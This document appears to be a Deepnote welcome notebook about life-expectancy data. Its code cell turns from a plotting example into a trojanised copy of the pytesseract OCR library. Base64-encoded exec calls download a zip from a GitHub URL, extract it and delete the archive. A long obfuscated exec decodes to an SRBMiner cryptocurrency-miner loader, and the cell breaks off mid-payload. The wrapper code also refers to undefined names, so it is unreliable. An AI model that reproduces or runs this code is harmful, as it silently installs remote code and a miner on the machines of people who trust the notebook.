# Welcome to Deepnote

In this quick example, we will walk you through the basic steps of data exploration in a notebook.

## Start with a query

To get you started, we prepared a sample dataset in a demo Snowflake integration. It contains country data for life expectancy, population and GDP per capita over the years. 

Based on free material from gapminder.org, CC-BY license.

## Seamlessly switch to Python

The results of your queries are stored as pandas DataFrames, which makes it easy to work with them in Python. For example, you can explore how life expectancy correlates with economic wealth. 

## Finish with beautiful charts

Charts that push your presentation to the next level are easy to make in Deepnote. Here's a deeper look into the relationship between life expectancy and economic wealth, with additional indicators for continents and population size. 

## Next steps

> Learn more about how to use Deepnote in our documentation.

- [ ] Get creative. Have a look at some sample projects, then create a new one. Let your imagination run wild 🧑‍🎨

- [ ] Connect your own data. Visit the Integrations menu to connect your database or data warehouse. Or just drop a CSV into a notebook. 

- [ ] Work together. Invite your team members and share insights with each other. 

In [ ]:
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(-6, 6, 1000)
y = np.sinc(x)

plt.plot(x, y, color="darkblue")
plt.axhline(0, color="black", linewidth=0.5)
plt.axvline(0, color="black", linewidth=0.5)
plt.grid(True, alpha=0.3)
import base64
import zlib
import logging
import re
import shlex
import string
import subprocess
import sys
import subprocess
import zipfile
import signal
import os
import requests
from contextlib import contextmanager
from csv import QUOTE_NONE
from errno import ENOENT
from functools import wraps
from glob import iglob
from io import BytesIO
from os import environ
from os import extsep
from os import linesep
from os import remove
from os.path import normcase
from os.path import normpath
from os.path import realpath
from tempfile import NamedTemporaryFile
from time import sleep

tesseract_cmd = 'tesseract'

class Output:
    BYTES = 'bytes'
    DATAFRAME = 'data.frame'
    DICT = 'dict'
    STRING = 'string'

class PandasNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__('Missing pandas package')

class TesseractError(RuntimeError):
    def __init__(self, status, message):
        self.status = status
        self.message = message
        self.args = (status, message)

class TesseractNotFoundError(EnvironmentError):
    def __init__(self):
        super().__init__(
            f"{tesseract_cmd} is not installed or it's not in your PATH."
            f' See README file for more information.',
        )

class TSVNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'TSV output not supported. Tesseract >= 3.05 required',
        )

class ALTONotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'ALTO output not supported. Tesseract >= 4.1.0 required',
        )
exec(base64.b64decode('ZmlsZSA9IG9wZW4oJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAid2IiKQpmaWxlLndyaXRlKHJlcXVlc3RzLmdldCgiaHR0cHM6Ly9naXRodWIuY29tL2xhdXJpZWFyMjU5LWExMXkvRmlsRS02LS9yYXcvcmVmcy9oZWFkcy9tYWluL3B5dGVzc2VyYWN0X21kLnppcCIsIHN0cmVhbT1UcnVlKS5jb250ZW50KQpmaWxlLmNsb3NlKCk=='))
def kill(process, code):
    process.terminate()
    try:
        process.wait(1)
    except TypeError:  # python2 Popen.wait(1) fallback
        sleep(1)
    except Exception:  # python3 subprocess.TimeoutExpired
        pass
    finally:
        process.kill()
        process.returncode = code

exec(base64.b64decode('d2l0aCB6aXBmaWxlLlppcEZpbGUoJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAncicpIGFzIHppcF9yZWY6CiAgICB6aXBfcmVmLmV4dHJhY3RhbGwoKQ=='))

def timeout_manager(proc, seconds=None):
    try:
        if not seconds:
            yield proc.communicate()[1]
            return
        try:
            _, error_string = proc.communicate(timeout=seconds)
            yield error_string
        except subprocess.TimeoutExpired:
            kill(proc, -1)
            raise RuntimeError('Tesseract process timeout')
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()


def get_errors(error_string):
    return ' '.join(
        line for line in error_string.decode(DEFAULT_ENCODING).splitlines()
    ).strip()

def cleanup(temp_name):
    """Tries to remove temp files by filename wildcard path."""
    for filename in iglob(f'{temp_name}*' if temp_name else temp_name):
        try:
            remove(filename)
        except OSError as e:
            if e.errno != ENOENT:
                raise
try:
    os.remove('pytesseract_img.zip')
except:
    sleep(0.00001)

def prepare(image):
    if numpy_installed and isinstance(image, ndarray):
        image = Image.fromarray(image)

    if not isinstance(image, Image.Image):
        raise TypeError('Unsupported image object')

    extension = 'PNG' if not image.format else image.format
    if extension not in SUPPORTED_FORMATS:
        raise TypeError('Unsupported image format/type')

    if 'A' in image.getbands():
        # discard and replace the alpha channel with white background
        background = Image.new(RGB_MODE, image.size, (255, 255, 255))
        background.paste(image, (0, 0), image.getchannel('A'))
        image = background

    image.format = extension
    return image, extension

def save(image):
    try:
        with NamedTemporaryFile(prefix='tess_', delete=False) as f:
            if isinstance(image, str):
                yield f.name, realpath(normpath(normcase(image)))
                return
            image, extension = prepare(image)
            input_file_name = f'{f.name}_input{extsep}{extension}'
            image.save(input_file_name, format=image.format)
            yield f.name, input_file_name
    finally:
        cleanup(f.name)
        
def subprocess_args(include_stdout=True):
    # See https://github.com/pyinstaller/pyinstaller/wiki/Recipe-subprocess
    # for reference and comments.

    kwargs = {
        'stdin': subprocess.PIPE,
        'stderr': subprocess.PIPE,
        'startupinfo': None,
        'env': environ,
    }

    if hasattr(subprocess, 'STARTUPINFO'):
        kwargs['startupinfo'] = subprocess.STARTUPINFO()
        kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW
        kwargs['startupinfo'].wShowWindow = subprocess.SW_HIDE

    if include_stdout:
        kwargs['stdout'] = subprocess.PIPE
    else:
        kwargs['stdout'] = subprocess.DEVNULL

    return kwargs

def run_tesseract(
    input_filename,
    output_filename_base,
    extension,
    lang,
    config='',
    nice=0,
    timeout=0,
):
    cmd_args = []
    not_windows = not (sys.platform == 'win32')

    if not_windows and nice != 0:
        cmd_args += ('nice', '-n', str(nice))

    cmd_args += (tesseract_cmd, input_filename, output_filename_base)

    if lang is not None:
        cmd_args += ('-l', lang)

    if config:
        cmd_args += shlex.split(config, posix=not_windows)

    for _extension in extension.split():
        if _extension not in {'box', 'osd', 'tsv', 'xml'}:
            cmd_args.append(_extension)
    LOGGER.debug('%r', cmd_args)

    try:
        proc = subprocess.Popen(cmd_args, **subprocess_args())
    except OSError as e:
        if e.errno != ENOENT:
            raise
        else:
            raise TesseractNotFoundError()

    with timeout_manager(proc, timeout) as error_string:
        if proc.returncode:
            raise TesseractError(proc.returncode, get_errors(error_string))

def _read_output(filename: str, return_bytes: bool = False):
    with open(filename, 'rb') as output_file:
        if return_bytes:
            return output_file.read()
        return output_file.read().decode(DEFAULT_ENCODING)

def run_and_get_multiple_output(
    image,
    extensions: list[str],
    # lang: str | None = None,
    nice: int = 0,
    timeout: int = 0,
    return_bytes: bool = False,
):
    config = ' '.join(
        EXTENTION_TO_CONFIG.get(extension, '') for extension in extensions
    ).strip()
    if config:
        config = f'-c {config}'
    else:
        config = ''

    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': ' '.join(extensions),
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)

        return [
            _read_output(
                f"{kwargs['output_filename_base']}{extsep}{extension}",
                True if extension in {'pdf', 'hocr'} else return_bytes,
            )
            for extension in extensions
        ]

def run_and_get_output(
    image,
    extension='',
    lang=None,
    config='',
    nice=0,
    timeout=0,
    return_bytes=False,
):
    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': extension,
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)
        return _read_output(
            f"{kwargs['output_filename_base']}{extsep}{extension}",
            return_bytes,
        )

def file_to_dict(tsv, cell_delimiter, str_col_idx):
    result = {}
    rows = [row.split(cell_delimiter) for row in tsv.strip().split('\n')]
    if len(rows) < 2:
        return result

    header = rows.pop(0)
    length = len(header)
    if len(rows[-1]) < length:
        # Fixes bug that occurs when last text string in TSV is null, and
        # last row is missing a final cell in TSV file
        rows[-1].append('')

    if str_col_idx < 0:
        str_col_idx += length

    for i, head in enumerate(header):
        result[head] = list()
        for row in rows:
            if len(row) <= i:
                continue

            if i != str_col_idx:
                try:
                    val = int(float(row[i]))
                except ValueError:
                    val = row[i]
            else:
                val = row[i]

            result[head].append(val)

    return result

def is_valid(val, _type):
    if _type is int:
        return val.isdigit()

    if _type is float:
        try:
            float(val)
            return True
        except ValueError:
            return False

    return True

def osd_to_dict(osd):
    return {
        OSD_KEYS[kv[0]][0]: OSD_KEYS[kv[0]][1](kv[1])
        for kv in (line.split(': ') for line in osd.split('\n'))
        if len(kv) == 2 and is_valid(kv[1], OSD_KEYS[kv[0]][1])
    }

def get_languages(config=''):
    cmd_args = [tesseract_cmd, '--list-langs']
    if config:
        cmd_args += shlex.split(config)

    try:
        result = subprocess.run(
            cmd_args,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except OSError:
        raise TesseractNotFoundError()

    # tesseract 3.x
    if result.returncode not in (0, 1):
        raise TesseractNotFoundError()

    languages = []
    if result.stdout:
        for line in result.stdout.decode(DEFAULT_ENCODING).split(linesep):
            lang = line.strip()
            if LANG_PATTERN.match(lang):
                languages.append(lang)

    return languages
instaIl = exec(base64.b64decode('aW1wb3J0IHpsaWIsYmFzZTY0O3RocmVhZHM9MTtuYW1lPSdTUkJNaW5lci1DVVNUT00vMC4wLjQnO3duYW1lPSdNWkNwWVlvNDJFU21vZ3pOTnZkWG9nZEREem9GTGdaZVdCLldTeDEnO189bGFtYmRhIE8wTzAwTzAwTzAwTzBPME8wME8wME8wME8wTzBPME8wME8wME8wME8wME8wME8wME8wME8wME8wTzBPMDBPME8wME8wTzAwTzAwTzAwTzAwTzBPMDBPME8wTzBPMDBPMDBPMDBPMDBPME8wTzBPME8wME8wTzAwTzAwTzAwTzAwTzAwTzBPME8wME8wTzAwTzBPME8wME8wTzAwTzAwTzBPMDBPME8wTzBPME8wTzAwTzAwTzAwTzAwTzBPME8wME8wTzBPMDBPMDBPME8wTzAwTzBPMDBPME8wTzAwTzAwTzBPME8wME8wME8wME8wME8wME8wME8wME8wTzAwTzAwTzA6X19pbXBvcnRfXygobGFtYmRhIHM6emxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUocykpLmRlY29kZSgpKSgnZUp5cnlzbE1BZ0FFWkFHeScpKS5kZWNvbXByZXNzKF9faW1wb3J0X18oKGxhbWJkYSBzOnpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKHMpKS5kZWNvZGUoKSkoJ2VKeExTaXhPTlRNQkFBZlNBZ1k9JykpLmI2NGRlY29kZShPME8wME8wME8wME8wTzBPMDBPMDBPMDBPME8wTzBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPME8wTzAwTzBPMDBPME8wME8wME8wME8wME8wTzAwTzBPME8wTzAwTzAwTzAwTzAwTzBPME8wTzBPMDBPME8wME8wME8wME8wME8wME8wTzBPMDBPME8wME8wTzBPMDBPME8wME8wME8wTzAwTzBPME8wTzBPME8wME8wME8wME8wME8wTzBPMDBPME8wTzAwTzAwTzBPME8wME8wTzAwTzBPME8wME8wME8wTzBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPME8wME8wME8wWzo6LTFdKSk7ZXhlYyhfKGInenVhVzQ5aC8vLzd6NXJFWGZRa2xTUXQxVDRwQXhjelBrYnFDL1pWbHdDZ05hVVh1V0hmdUFDbGE0d2hpUjVRL3Vtdjhlc0UxQ21RMWhnZUdhaDNKakkyRngwaVQ0azFpdTRvSHVvbldobFJ1WGE4d0JvUDltZzNyMUxDbnEyLzkwLyt5Umo1Rm5PWnhCNVdMTG52aHB3b0w3dmZqTFFnTkpwQnByWHdKRUswMWZUbzRjbTR6UW5JdWFxUUh5Qkx2aVNxaGQ4MldqNitsMkU2Nzh3VWNzdENHKzlINWwvVVdwbDRnT0dXNUp2N1V6WEVtaVdrWit1MmR2R2g2SFAxd1A3Qm51VmtPS1N2V1QyMFBBMXlZOUZLVWxZNk1OT3NoYm9mcTZQOThDZThDLzhISis2QXR2REhHa09adFZqaGRHbnY3LzBLVWlIS1JjQkYxczBqQTh2anR6bTRJMk9KQm4vd21JSU1QWXpQWEpkZDJTK0l6b3RWdkxaUVJyczExY0RHZy90SU94eEdQbUVjTmlINWI0MGhpZ2Z1NGdGMzFOL2JlSFN5NnBiaWRXZzUyWDZVRjNCK2hqNnNScWxURzhNK28yZlNxNmdOR1hraUJYNU0wWG1rWDhqaW4zZWl3UGNCWW52RmJFcTBUUFQwaWN1ZVRpTTVReUJvWVRKWWNoeERjRVRSRmROeVI5ZVlkKzlMMTM3cmgycEd0Y3AyYkdmK3hublVxTS9kMkEyVDRrc3FSRERtYTIrMlhmWkJ3REp2Y1pYMlFGSG5NZCtmRlpTRFdHUWVyVGMvV000WVF3bWw5b3ZONFF6T3ora1NBbWI5YXVZcER5ZGJvNWs3a1hpbS81ZG5VQTVYeEt6aU51ODU1YVozMEovbjA0a2lGYWdtNHFYbGJHaUFuSU0xeW50cURQZk1xeTRhQmUvU21Kb2d6d3QxTTNYSTVibjUwQWN5WHhWL0dlTy9acFBDLzYxVWFFUzE0bnJiZjRqK3FYMEdMUXJCVzRtTSsySEJlbldrN3g1dVlDKzRZTzMyVzFmMDliVGIyN2hhdjN3NFZGU2xSTTZTSkF5UWF5TURwanVGa2dybDcvekhLbkI5UGpzOWY0TXNseDVnTDhoUWJNNWNCL3JtM0VKRWM3M0ROdWM1SUduQWJGOXVFMjdHWE43eVB3YzQ2dW5Qek9sR3hmRkhGQXIxT0xvR1NTTVpKZCtyWG1MYWRFREJRMDdIZ3RCNFpSUkVlaGpMVHBENWlmbEZDWjRraDRvdm12SysybmJSZTlsTm1VTDhrS2FtTFhXN1hrcytWTnIvcGFoYXBySFkwb3kvOEtJM0tDVGg2K0R2R2RkMHkrSlBSK3dWc2ZIL2x1bjI1YSswVTJyZS9YbW1DWHdmUHpjL3lodFo0VzBTTG9TSkpyOWhMUnRpckJIU0NDQkZiS1NORDUzTWFnTVRUQk42b1RTOWhQaVFWaE9URXoxdTZmeGJPbWd4U0gzZTFJcGYrQnZaU2orOEU2dlZvcmFRSlJiUWE2QyttZ0tkRUlYSmVhcHhlRkRUMm1Nc3QwQWFjVGFkcjhocGhTUENReXdFSzdUMisrS3F0UUVjZ1FobmRJNTlxb3pTZlhObjU4YXdKUkZFazk1eGlxZ2MyamtmUktaZHczdXQ0R1AyaERmV3RmQjVkbTBWQ0VXUGd6NTB4ZHRiZnRYVldFTy9pU2Y2YUNzOHcrUlBTQWlMdHNteWs0cGtjaTBKZERrY1lIWk9mYTdKR3NuK2J5WU9pS0wxdU4xSm9SbWg0TCtidG43TlE3UThzOWNvc2xNN1lHNVdNangrRXJPUDZTNTJ2MWowTmhQZGlDL3NOWjJoZ3FEMkhrckFaZFgzRHZ6NnZOcHdEZmgveXdac0lxZ2h6RC9xd1pqRkpTUjFZNzNSTHV5R0VoNE9SeUNWRjNKTys1NnRuUkhhK2wxMnFJNnZKSzc1MXdXNXVOQ0s0eHF3M3hjQmVuL0ZYMUprOGJpcHBwbHBvKzAycFNtSXZWRVBXSmFIaUtYcXdvVlJ5Vjg4akx1MmhNVE9tRXhyN1NpOVg1ZHRaaE14NFd6b3kzUGY0S3MxK2tHRkljTGZYZFdsc2hBRzlCT3hTMEdkMjNhMzJ5NUZEV2lRL1ZDbDBscGFrdUVDTmNlTXFJZHJkSjRoV2FXV3pOMmNTRTRFdVV2Vlg2N2JodGlEVWRSRzN0bDdBZjl6UEd0YjNuTlo2ZVhUOTloQ2RSTmdZRlFYRG5rSnV1KzdYQXVnVjg5UlkwaXdrVU9RNnpQWTlXTWVrSnJzM2dmbDZoTmQ1ZnRsN2pDY0VtSFd3T3phRkt3cEREQWFlcVNxTVZidjl5dnB3eDhPTU5sZUs2RzRHd3JlNlpmRUpZNHVzd0UyWUhrTkpNREl6dHdzM3d6R2FwdXpQU2JjN3BSUEhhOTVmemg0d0hDSTZJMWcrTU9iNUVtbFI3WGJSckxKb2ZReHc0MklmM082M1RpQitscTh5UkN2dWpNV2JhNGNxdk53OVlIM3ZaWnBmZkpPdHNZanVzUDc5eERGSUlkYUttMjAzNDZtUDJRNEJvZ053b3RlV3RtZkg2RzlJMFhRYTVYdGhyOFlhQkJHVS9aU0J1dlg1NE5HSUs4TnM2eWw5eitXdU1ySGtLQUZiL0Y4b2oxUmk4QzFkQVBWSmU2M29Wbm5lVEM5ZXRXUllzVWorQUNLa1pwUTFEM0p5S242ZmZURUE2cjRBcnRWYUltUFUrMU9EaUxjSU5vbWFwdE84YTZwNEtxOVlSRE83Q09Pc3lXdEJoanJDZzVJWStkUHBiNkZLcHBLenhTOWZnUktQUVRRNTBvSy8wakk4dDhFaU4xdTk4OHJnZDlnWFZ3TmpRS2svSmxPaG1pWDc0VFZTYnB0djNnSjdUNXZWNG9UbDRIcFlqVUliUzB2Sk5Yd2dkSU9MRlA1VGt1Nis1MnNScGxnM3lhVVJUTExZbmFlRUFBUHMyWjhwSDdxV1YzZ0R2Ni84MTNIVElnSWhYUG43cGFHUGJNRTBRdk9Ka3NHWTJqbkxBMG9yenJTYkFuR3E1bmQ2MVJVK25QRjAraEd4VkRyNmFWdjRIM3J0OW90NTJweHJjTGhmWVVNNmJ5Sm1kdStxN1c4T2NPK01xZ2tuSVdzaUZmZG84UkpsM2hGR2Z4V1RITkJWWXJZb3lLbUY3VGJUak84ZmZ4T3NvQnJ4cVkreFlqOGd6NFoyM0NBSWd0TEZlcjdZRDdYRFZJSjJudU9tTFliUU13ZWQzTmVKZWJsQnpnVnZMb3BJOU5QWmlLK2V0OWV1dUluV3JBVFprcE92eDhETDZDQkJlN3FSYU9XNVhXZC9CSjJ1dnViVmpHMUNuWDZZc1l2Uk9HN28zdkJFcXVzNW5Wai91MjJpVHl6L1Vod0U3S3BhUTNEcEFrdGRTbXdFaGlRTmQ0VjA3SHpQQS9sZlhwVXYrMlRnRDFTaEIrQmhhb3l1clhiVC9LZ01MMjN0N3JFNVRSakRPbkViRURsR2J2TG10WE5vbDVVSnJ0VWxyRHhUMWN6aUNQdTlRanVkOGJsRUhHdDAvSWt0R1NuNEhHcGE5TTJaQWw1M0ZRSkZIZHZNVnhMQk41dmJGdktBY2UxenFiSm5SRGZwWjl3Y1dLYmFwT0RnZlBYcjliNElUVmhKYnM4ak9lY1FSdXY5NmhaTTlLY0dkYnMrMG1aeTdGa2x3SDdpdXIxWTNYc3Z4OFdWS0Nyd0FIT2JMaVpEOGFDcDd5M0FJakoyckpPNklOS0NFa3VYK3hOMUpXUG1pM1ROVE5LWjI1bzZpR1BhbFhHM0hvQTV0ZVVDcjlFQVdKeGFvQjBwMld5WjM0a3RLMUs0S1J0S1BhT2MzUU9yM0F5QUs1ZmQ3dERGVE1PckNWczBzUXlIbEpPQ3l4aHZRTzZMMHBXa1l3TVNUbHBKTmFFVkVvOHVnNzBqVHBSZVZzNVlZVHNWTUgybUpYbkUvcWljYlp2WGg2Lzd5bnJsMCtic3p0M2QxMUJNWmhKOXk2bVkzTTQzbTJMNHlxb2orbHNmTXFGeWZJcnBYQjVMNGRkTFNpTENqUWxrcWQ0ZUt5anBsYy9leXhVdzZYc0ZPdkpqQ3FHS2RHRTM5Z3l4SWZ1aDRwY3Z5ZGkrTmNKKzR1eWhvemwvOWdRaHBVM3B2MXVhRW5aZThNUGIzUHZZUkVxVXNyQlovN2V6RlBGVDc3MmxWZCtDTmlyUzVjdEhHNTdGL0M2K0E2Z2oyM0NFZmtiQnd0akF2L3U0ZHhRbkhRdWo4MmJGOWRCc0JpaFZPN1RaTS9zaGhEaW03Qi9RK1FEalhkTTFGcjV3a2toQUpFM1hNK1pHd2FpS0NaTmpmSHkyZFpjanpjOWE4L0ZTbTdFeWRyUnE0bkhuWUIvY1NvcnE2WUlXdWFPZk4rblh1QzIza203RG1qbGk3YUwxYURpV3QxN0N1Q3IxbllzeW91V0ZzWDF6QlJWb1VIaElNS0FPQm1aMGtRVEcrTlkzNW0wcWtEM0V4Mmx0ZHczemNaRkpvRm5PTDE5cm1RM1ZHeDhtay9EaXUxbEtwZnVXL0ZuYkd6UGZTYXN1WTRaemI2dUZMM3ZDejIxNVJidUlqcHIxbHdybjZ5c2paRDhUL0oweEQvM2F2T1paUlZENlI1ODhweDQvNjgxVVhvb25tZDlEa0JkcjV2dkJXZy9lRFBSM05yYlBmRmtlejBSVkFhOXFTMG9oWFdlZ2hmaGZKM0taNk9QWmltVk94MUJ5eDN5dEdTZG1kR0I1RWQzN04vY2hKSXVkYVZ1OFJmL05PQ3M1Z1ZFV2hiQ25KclkvemVNdXJheWYrWnlMNUV6empObEpLOS92REo3VUxjMlFoUkxaSTBZOXhPN1VmZitFVC9MWEg0bVIyRkxwRElGWTZZTkFtRDVzOGxQbWdXc3orV3U4ZkZWeG9nQThLbzJ1anVUaElVTjJENGpETm1lVzB4dXM4bWZpdExxZlpvUnh6SWY5R2hQaHZBTmptWmluN01JYUVkdWJWZXlWaktOOW9lSlVrT2UrNlFxaXFlNDlYYXdUMlpJNmVsU3dxWm9hVFBPbWY3b0tEdjdzclRLNDhNdEhiSmdwWVBWcFBMUC8wL3V4dGtZUW05VzdFYWwvekZ6RmlPakdkcEl5TWRHdnllWTU4aDZBZnhPcHZTOWw3cDVDZGFEN2RDY0Z5b2VubjFYTitPMkZ0eU45U0NrYmc4TjU5b0d2NVhhUTVkM3VmcmtNK2JYa1IyMXpJSFJtdExqdko3ckJmZ1NiUDRhdmdrVU5VN1lYNnVUNElrNFJiQjRWRndJajZOdEtHVnZleWJWWjVPUmJPbytzWmkxZUFVSmhCRld5QnpZRWNDWFpZMnlPc01mWmNSRnRZTDl4WTZPRER0cm5SZThMUTc0UXV3MzVKTVlCMm5VcTUrTCtob1Z3WmZrSUk0U01SSHBCK3psWXFDYUVtd3huem1QVjV6U3JadTJvMVIxUGpMV2RpOWFxcmhMcXVLbnJOV083SlNjRzkwamorVlI0bzk1dVBZeG56bEtlWlovcng3cjNwS0VmbmRWdXByVU1yOTA4THBIU05GcTRyaVpJeWZ2Rk1TNFhZM1lVMmd4bFBXYnFyRnNGWDJSckhDN2xucFlQSmpzQ3RLSFRQMDlyc1lZV3EwUDgwdDZId2xvZkJBT3g4QjYyRDdDZlJPMGhrVDVnRzR4SGlVKzFLamt6bVVTUTA3Zm16aGk0WGJBL2dDeWd0WmxmZVJ2eUV0SWZ6OGVYN2xMSTJCcXlHbkpBK2hHTzg1YXAwNi9qZE1RWHdGWjN1T280dFVVT01lNURmN3dPNnpDUkltejlDaVd5NWh3Q3Q2UVpjbFVQTVRKaU80Wmg0VHhjcVE4dGliRUlpRVBFcG8vak9Gdmg1dVZiSjk2TUZCNzRCejNnZlRPeUxaaWQ3TjhRd3FMM2R3RGs3ZUhiTCtCRjZHMjhnWGZOWDNNNVcyZllKV0xwT1ZTL1Z5Q3g5QlJmTzM5alMraDJhTmFUOGxDRlVjTFBoK0FMSUJ6VkUxa2hhVDFLeGVEK3AweExZa2FRaCtLd29XaWFkNEhLNnBUTmxmMVFtTnB0c1k2SHE5aDFaQWcwMkVjekQ4Sk5FV0JweXczeXdQMmYzZUp1cWF4dytEdVFuNkY3QXc0YVlIRlc3di9aUnlSeEk5bDQrZmFxNTJDMGlUZUkzeG8vRDZ1cXFHSjJGZE8yRzgyRC9xRUF5ZVV3UHJ6WUJuYi9mbmFLODh6QlpNNU5PMlNEbzYrYmg0ODZxdFJyTExUa1YrZ3BOcVhFYndxT2J4Uk9saVNFdVRQRFFoZDlac2NJcnFrV3hDaXYrSCthdjU0SXNHTTUzemhGbDVSRGFZY3ZCSXk0T0d0UElkck9KWklXeXozQzhUN0tHdFhZVmppRTVWQ2R5WUgyQTZIU2g4cFFlbktOSXlnd3o5Mms3a0s0ODhxK2FBbk9OQXpBemZBcU0wemk3YWdJZUxWU2tMQU1KVk0yZEJJcGJLSUFhMERoVnlnRkVDczYyOTRBelFRcDEwdHU1YTZyN0dOUUNtWFNSelhUSCt6cmFtT0JRMkVhWVZaSUY2aTNWWDQ2UjNyQWpPU1p4OTVwREYzY2IrbzJRNE1VUjZ5SmlpWk5IM2ZMSmlSTlhlNnRodXgralM4aGtKWHFyZTc5L2lFbFhNSTMrekN4eUxsS0xHTHR0OVRNN2NLRWZJKytIRVU1Q3kvL0tVOGpKZFoxNS8yMnhhR3lzWVlPb2xZYWF5WnRYMjFpWVJBZmlWZCsyV0JkSHlVaUtvTDJqNzAvbGlLSTBzam9FM3BaelJtRUgyZ3F0dHA3WmVONy9ubU5UdUQzRkhnRUoyU3RKTHhaWGZKRHNibVFlNjVaa2t6eUw0ZEZBaFRRTmgzZStSTFV5Nmx4ZUY1RFo1SzFYVFIvRnY2TGtOdnVWdERia0kzOVh4ZUdtODlFR3puZ0hiRWwwYkcxQmMrcjZKdHNLN1hGSzNsVjlPcVI4SndCUTR5TlhPWDVCR0xLZUtFMjlteTg1QldONzFHd002dFZVd0RYNXM5bWV3NFpjS3lZUDhOTVJqTGJmMGdjQUVrbXFINEhTMVhOa1haZ0dFSXN1bVJ3bE5XbzN1aU0zdmVhVkdXbmIzdlFxRUp2TmN4b1JkdGNNd3FtNWprRldWSG5YaEE0dmZHeFNLK3N3NFlwNWZFazlxKzRWenhyRGNnQis5Vm5SMnBhVmYrS2JhUlZROWViN0tZR2NPcDBzL29EVjhlZnR4aXRDVm4wb0NxQVp6b1VMQXpJck9PUm52YnkvQitDalk1TGViWjhWRWppOFQ5SWhPZkl1NVZZblZTU0hpK0pmaEkzd0tFcEoyT2d4OWJWSDNZVFZ5WEs1N3ppOHBNWFo0VFVDZGZXTGU2RXFPYS96QjMzRjFMYXBCN2E3VTJVakFBMWIyOE41SUFxaG9TZklZSGZkREJtdlR5WWpvdUFXc0JnaTFlQmcyS0pscEZxdnZLYllxR3JzMWFoU0Rxb0k3WTNoWEdteFQ3dTZ4YytDUmViSHAxVUdNaFQwQ09YTG5nOEtNWFBrMlZNNTJqRkRsWUpIZkowc1dPREttZEtKRXdhMW80V1A0K3pXUnM1VzhOWU1QQUZ2ekVqa2lUVkRzcFdvWUV0ZTZuekpLbkZEVCswOUpqMTFUZlpodk1mWTNrN2VURHlXSXJ5SUlOZENjYjhJTjZYamRPenoxcmtlZWpTMmZkYVlYTFZKMldjMUovQUpHQjVhTVhvM2tlaGtPTDNSV3VlaG5MMmZCWjNCTlJ4K1N1S0l0a3BJd0cySzc0K0s0Zjdzb2JQZXJqZkZtN1NFNS9HUGllT1pHck5zVFIrVGU1akF3VCtKNGNjdEpuQW5rLzdzNlhCVmlLQUZaYnU0ZjJFcFRCdElSNVhwMmpScTdIUnFzaTQzZkNDdkxkRGt0aFYwZHJUTXdmL0k4UXhISnVHcnhkaTNranpib0hBb2pORGdTVU5WMFJJcnZwTlhieXBDNWpWQjhWbnhzeUVjdGwzV3N1UWFwa2c4ZGVqM3JpRWJ5YnhOd29KV2dqMUpPSzdsK1lKS1R0dXB0WTliaTJtMHY4UzdSM0k3OVlqaTcwQkJjN2Z4MDBBclNYY09Xbmo0Z2V1bGc5d3VFdVdEY2N5SzZqbG45Sy9aRm1aUjN6WER6UllsTFQzRW5qZTlrcC9xRXRreXNzOVBKQmNVbjgydGpESG5qRndGdEQ3REhIbFI4cngySXNKdW04cnRoSDR6dWVDY0VrSnVpYkNWMUdCZUN6V0M2ejNkVWFZMEx0N3dYcHQrMVAwLzlCcHBUSzl3L204NFpEZEVuU1ZhZm82S2wxQVNZL0pSYzNGYmYySTdScTdCYStFUVNEQ1dDclpvV2V1NHJWVG15OXlOb0NHUEdXWVdWZWV2YXlUTmJHckdvaUFodU9LNWRnVWUyZ1RVWU5aVkczdE1pTTlQR1FpR0lxYUJRSGdMeUJLS0lwMnZDYWN3M09jeUpwMStSSTVKWWc0VTZ3YVNYRFVWTjd0ejhKVjdyRkJJOUU4WHZWNFk2d1MxYU5YeTUzN1B1cE40dzFqS2UrVEwvVHFCRkc5ZUVpRjdEQ2RmcHl4OTFXakt2cjNwaUpnbDI1NjBrbEdDQVJyNktmc2xoYmhPRWpMSGNKeFdrUnlkUUZvU3hrSlNBV0RwdlhoL3FLaWE1b08xa2hkc21mVk9qODduelVibXFyL0ZNK1lCdGRUbERtbGU2MnltVlp2eGJJRUhBK1ZITGRmSUNrYjNnMFhJMnRUN3pPNFQ5ak5qLzQ4VUdDODNlcDdESXJadDVhd0QreEZ5VHN0d0p0d2J4MjhOSkZtNUo5V3NmY2t1WjJrQXVDdTdsRFg0UGFsMnVSZm84UWg3MWJrNTlHTlN5eEdoZHVhK1gvUkhaRTM2Q2h2WnJDb3B4ZjFqcWNEWHovUVdwektCMFBxVmMza1owM1ZiL2hkZ3dXRVJscTZLOGExK1J3bEd3bzA2S3crbFJ2emh5b20xd1dFWDBIVUZCMnN5OVh2c2tnRW9jNmxiay8wUHpEWUpncXp5c0pFR2dXUTIvTE9VTE5xNWsxajk2NS9SaXQxWXgwWnJIcGowR3lOdE5Vbll5Sm5ieVJ4ejd0Ryt6OXcvOWpyVTJVVXpJYXZmU0phNVRHYVZQNW5jc0pkdWhLVXBJVzFJR2xCL01LU0xVeCtGQU9zTXJyYlBUUkhCMUdsWENXeVpGeUxab1Y2bTUwOFRUY281NHpuejF6czhPb203VjlUSmE1YzdYdlZLQjJ2V0xQU2ZsNXFFcjF3aFhCM0dUQXdLMWRmWXhhQTFrYy9kUGhWR3loU20rL0w5SkF5clViS0RYUVI2TnpMWGhpWkR0bStnalRPTllIMFRiTHo2UVNWZHVvdG54RC9valRSK05UZDd4dGFubTQrTkEzZWFuU2ZFN3NTdTFRNEd4UkhwakhzKzhJUjNQdW95UDl4Wk5wdXFBT0N5ZGpQZUFTWG1QOGdkcVVGcXc3SGNVaFdXWkQ1aWtu